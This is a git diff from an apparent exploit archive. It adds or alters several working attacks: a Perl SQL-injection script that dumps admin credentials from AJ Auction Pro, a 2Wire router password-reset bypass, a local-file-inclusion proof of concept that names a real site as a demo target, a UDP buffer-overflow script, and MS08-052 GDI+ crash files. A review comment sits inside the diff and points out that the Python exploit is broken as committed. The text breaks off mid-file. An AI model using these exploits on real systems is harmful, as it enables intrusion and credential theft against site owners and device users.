login.\n\n"; } -} -else { print "[-] Error, ".$response->status_line."\n\n"; } - -# milw0rm.com [2009-08-18] +#!/usr/bin/perl + +#********************************************************# +# # +# [o] AJ Auction Pro OOPD 2.x SQL Injection Exploit # +# Software : AJ Auction Pro OOPD 2.x # +# Vendor : http://www.ajsquare.com/ # +# Author : NoGe 
# +# Contact : noge[dot]code[at]gmail[dot]com # +# Blog : http://evilc0de.blogspot.com # +# # +# [o] Usage # +# root@noge:~# perl ajpro.pl www.target.com # +# # +# [o] Dork # +# "Powered By AJ Auction Pro" # +# # +# [o] Greetz # +# MainHack BrotherHood [ http://mainhack.net ] # +# Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang # +# H312Y yooogy mousekill }^-^{ loqsa zxvf martfella # +# skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke # +# # +#********************************************************# + +use HTTP::Request; +use LWP::UserAgent; + +my $target = $ARGV[0]; +my $file_vuln = '/store.php?id='; +my $sql_query = '-null+union+select+1,2,3,4,5,group_concat(0x3a,user_name,0x3a,password,0x3a),7,8,9,10+from+admin--'; +print "\n[x]===============================================[x]\n"; +print "[x] AJ Auction Pro OOPD 2.x SQL Injection Exploit [x]\n"; +print "[x] [C]oded By NoGe [x]\n"; +print "[x]===============================================[x]\n\n"; + +my $exploit = "http://".$target.$file_vuln.$sql_query; + +my $request = HTTP::Request->new(GET=>$exploit); +my $useragent = LWP::UserAgent->new(); +$useragent->timeout(10); +my $response = $useragent->request($request); +if ($response->is_success) { +my $res = $response->content; +if ($res =~ m/:(.*):(.*):/g) { +my ($username,$password) = ($1,$2); +print "[+] $username:$password \n\n"; +} +else { print "[-] Error, Fail to get admin login.\n\n"; } +} +else { print "[-] Error, ".$response->status_line."\n\n"; } + +# milw0rm.com [2009-08-18] diff --git a/platforms/php/webapps/9459.txt b/platforms/php/webapps/9459.txt index 1842791e6..5698e170e 100755 --- a/platforms/php/webapps/9459.txt +++ b/platforms/php/webapps/9459.txt 
@@ -1,20 +1,20 @@ -2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET - Part 2 (08/15/09) - - -DESCRIPTION ------------------ -Additional to the authentication bypass exploit page submitted by hkm. - - -EXPLOIT/POC - ------------------ -Authentication Bypass - just use this page to set a new password - -http://gateway.2wire.net/setup/password_required.html - - - -bugz - -# milw0rm.com [2009-08-18] +2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET - Part 2 (08/15/09) + + +DESCRIPTION +----------------- +Additional to the authentication bypass exploit page submitted by hkm. + + +EXPLOIT/POC + +----------------- +Authentication Bypass - just use this page to set a new password + +http://gateway.2wire.net/setup/password_required.html + + + +bugz + +# milw0rm.com [2009-08-18] diff --git a/platforms/php/webapps/9846.txt b/platforms/php/webapps/9846.txt deleted file mode 100755 index a8493d0a8..000000000 --- a/platforms/php/webapps/9846.txt +++ /dev/null @@ -1,22 +0,0 @@ -[*] Endonesia 8.4 CMS -[*] Site: http://www.endonesia.org/ -[*] Download: http://sourceforge.net/projects/endonesia -[*] Bug: Local File Inclusion in mod.php file ! -[*] Author: s4r4d0 -[*] Mail: s4r4d0@yahoo.com -[*] Team: Fatal Error -[*] Poc:http://www.site.com/mod.php?mod=/../../../../../../proc/self/environ%00 -[*] DEMO:http://www.trubus-online.com/mod.php?mod=/../../../../../../proc/self/environ%00 -[*] SecurityReason Note : -# -# Vulnerable Code in mod.php : -# -# include("./mod/$mod/index.php"); -# -# magic_quotes = Off -# -# - sp3x -# -[*] Greetz: Elemento_pcx - z4i0n - D3UX - m4v3rick - HADES - Hualdo - Vympel - sp3x ! -[*] Made in Brazil -[*] Reference: http://securityreason.com/exploitalert/7435 \ No newline at end of file diff --git a/platforms/windows/dos/33403.py b/platforms/windows/dos/33403.py new file mode 100755 index 000000000..b9f47968d --- /dev/null +++ b/platforms/windows/dos/33403.py 
@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/37325/info
+
+Intellicom 'NetBiterConfig.exe' is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+#!/usr/bin/python
+
+# Intellicom NetBiterConfig.exe 1.3.0 Remote Stack Overwrite.
+# Ruben Santamarta - www.reversemode.com
+# For research purposes ONLY.
+# If you use this code to cause damage I’ll cut you open like a f***ing pig.
+
+import sys
+import socket
+
+s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
+s.connect(("10.10.10.10",3250))
+s.send("protocol version = 1.10; " +
+"fb type = EVIL-DEVICE; " +
+"module version = 0.66.6; " +
+"mac = 00-30-11-00-BA-CA; " +
+"ip = 192.168.1.52; " +
+"sn = 255.255.255.0; " +
+"gw = 192.168.1.1; " +
+"dhcp = off; " +
+"pswd = off; " +
+"hn = "+"A"*0×60+"; " +
+"dns1 = 192.168.1.33;")
diff --git a/platforms/windows/dos/6619.html b/platforms/windows/dos/6619.html
index 421440c58..bdc2f8fb1 100755
--- a/platforms/windows/dos/6619.html
+++ b/platforms/windows/dos/6619.html
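Review bot: The new file is not valid Python as committed: the SecurityFocus summary (`source: …` through `Attackers can exploit …`) sits above the `#!/usr/bin/python` line with no comment marker, so the interpreter fails on line 1, and the `hn = ` line writes `0×60` with the multiplication sign U+00D7 where `0x60` was clearly intended, which reads as a copy-paste artefact from the source page. If the archive wants the file to stay runnable, prefix the six prose lines with `# ` or move them into a docstring below the shebang and fix the literal; if it is kept verbatim as a reference, a one-line note at the top saying the header is advisory text would save readers the confusion. `import sys` is also unused in the body that follows.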
@@ -1,44 +1,44 @@ -<html> -<head> -<STYLE> -ef\:* { behavior: url(#default#VML); } -</STYLE> -</head> - -<body> - -<pre> -================================================ -MS08-052: GDI+ Vulnerability ------------------------------------------------- -Operating System: XP SP2 -Internet Explorer Version: 6.0.2900.2180 -Gdiplus.dll Version: 5.1.3102.2180 - -Credit: -John Smith, -Evil Fingers - -Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt -================================================ -</pre> - -<XML:NAMESPACE ns="urn:schemas-microsoft-com:vml" prefix="ef"> - - -<ef:oval style='left: 500; top: 500; width: 500px; height: 500px;' fill="true" id='ef_oval'> -<ef:fill type="gradientCenter";></ef:fill> -</ef:oval> - -<script> -var focus_size = "-5, -4"; -var focus_pos = ".1, .1"; -var ef_oval = document.getElementById('ef_oval'); - -ef_oval.fill.focussize = focus_size; -ef_oval.fill.focusposition = focus_pos; -</script> -</body> -</html> - -# milw0rm.com [2008-09-28] +<html> +<head> +<STYLE> +ef\:* { behavior: url(#default#VML); } +</STYLE> +</head> + +<body> + +<pre> +================================================ +MS08-052: GDI+ Vulnerability +------------------------------------------------ +Operating System: XP SP2 +Internet Explorer Version: 6.0.2900.2180 +Gdiplus.dll Version: 5.1.3102.2180 + +Credit: +John Smith, +Evil Fingers + +Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt +================================================ +</pre> + +<XML:NAMESPACE ns="urn:schemas-microsoft-com:vml" prefix="ef"> + + +<ef:oval style='left: 500; top: 500; width: 500px; height: 500px;' fill="true" id='ef_oval'> +<ef:fill type="gradientCenter";></ef:fill> +</ef:oval> + +<script> +var focus_size = "-5, -4"; +var focus_pos = ".1, .1"; +var ef_oval = document.getElementById('ef_oval'); + +ef_oval.fill.focussize = focus_size; +ef_oval.fill.focusposition = focus_pos; +</script> +</body> +</html> + +# milw0rm.com 
[2008-09-28] diff --git a/platforms/windows/dos/6716.pl b/platforms/windows/dos/6716.pl index e6c96e832..d21cf6cd5 100755 --- a/platforms/windows/dos/6716.pl +++ b/platforms/windows/dos/6716.pl 
@@ -1,217 +1,217 @@ ------------------------------------------------------------------------------------------------------------- -Operating System: XP SP2 -Gdiplus.dll Version: 5.1.3102.2180 - -Credit: - -John Smith, -Evil Fingers - -GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt - -PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt - -http://www.evilfingers.com/patchTuesday/PoC.php -============================================================================================================ - -#!/usr/bin/perl -# -use strict; - -my $gif = - -"\x47\x49\x46\x38\x39\x61". # GIF header -"\x65\x00\x65\x00\xF7\x0B\x0B". # Logical Screen Descriptor -# COLOR Stream -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". 
-"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". 
-"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x21". ## Extension Introducer 0x21 -"\x2C". ## Label 0x2C -# Data Sub-blocks (1) Size: 21+1 -#0 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#1 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC". -"\x21\xEC". -#2 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#3 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#4 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#5 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#6 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#7 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#8 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#9 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#10 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". 
-#11 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x2C\x00\x00\x00\x00\x0E". -"\x01\x5A". -"\x00". ## Terminator -"\x21". ## Extension Introducer 0x21 -"\x2C". ## Label 0x2C -# Data Sub-blocks (2) Size: EC+1 -#0 -"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". -#1 -"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". 
-"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". -#2 -"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". -#3 -"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". 
-"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". -#4 -"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". -"\x00". # Terminator -"\x3B". 
# Trailer - -open(out, "> crash.gif"); -binmode(out); -print (out $gif); -close(out); - -# milw0rm.com [2008-10-09] +------------------------------------------------------------------------------------------------------------ +Operating System: XP SP2 +Gdiplus.dll Version: 5.1.3102.2180 + +Credit: + +John Smith, +Evil Fingers + +GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt + +PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt + +http://www.evilfingers.com/patchTuesday/PoC.php +============================================================================================================ + +#!/usr/bin/perl +# +use strict; + +my $gif = + +"\x47\x49\x46\x38\x39\x61". # GIF header +"\x65\x00\x65\x00\xF7\x0B\x0B". # Logical Screen Descriptor +# COLOR Stream +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". 
+"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". 
